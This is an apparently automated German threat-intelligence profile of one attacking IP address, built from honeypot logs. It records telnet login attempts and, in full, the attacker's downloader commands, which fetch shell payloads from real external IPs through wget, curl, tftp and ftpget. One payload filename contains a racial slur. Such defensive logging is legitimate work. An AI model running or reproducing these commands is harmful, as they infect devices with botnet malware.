Aktive Bedrohung • MITTEL
176.65.139.16
🎯
31
Gesamtangriffe
🔌
1
Ports
📡
1
Angriffsarten
🦠
3
Malware
Geolokalisierung
- Land
- 🇸🇬 Singapur
- Stadt
- Unbekannt
- ASN
- AS16276
- ISP
- OVH SAS
Angriffsarten
cowrie
Angegriffene Ports
23
Zugehorige Malware
Versuchte Anmeldedaten
🔐root/root
2x🔐root/1234
1xAusgefuhrte Befehle
$
uname -m3x$
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /;wget http://48.200.96.137:8080/ez_nigger_xdd.sh || curl -O http://48.200.96.137:8080/ez_nigger_xdd.sh || busybox wget http://48.200.96.137:8080/ez_nigger_xdd.sh || busybox tftp 48.200.96.137 -c get ez_nigger_xdd.sh || busybox tftp -r ez_nigger_xdd.sh -g 48.200.96.137 -l ez_nigger_xdd.sh || busybox ftpget -v -u anonymous -p anonymous -P 21 48.200.96.137 ez_nigger_xdd.sh ez_nigger_xdd.sh || tftp 48.200.96.137 -c get ez_nigger_xdd.sh || tftp -r 1x$
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /;wget http://48.200.96.137:666/payload.sh || curl -O http://48.200.96.137:666/payload.sh || busybox wget http://48.200.96.137:666/payload.sh || busybox tftp 48.200.96.137 -c get payload.sh || busybox tftp -r payload.sh -g 48.200.96.137 -l payload.sh || busybox ftpget -v -u anonymous -p anonymous -P 21 48.200.96.137 payload.sh payload.sh || tftp 48.200.96.137 -c get payload.sh || tftp -r payload.sh -g 48.200.96.137 -l payload.sh || ftpget -v -u1x$
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /;wget http://160.187.246.23/all.sh || curl -O http://160.187.246.23/all.sh || busybox wget http://160.187.246.23/all.sh || busybox tftp 160.187.246.23 -c get all.sh || busybox tftp -r all.sh -g 160.187.246.23 -l all.sh || busybox ftpget -v -u anonymous -p anonymous -P 21 160.187.246.23 all.sh all.sh || tftp 160.187.246.23 -c get all.sh || tftp -r all.sh -g 160.187.246.23 -l all.sh || ftpget -v -u anonymous -p anonymous -P 21 160.187.246.23 all1xRisikobewertung
40
/100
NiedrigMittelHochKritisch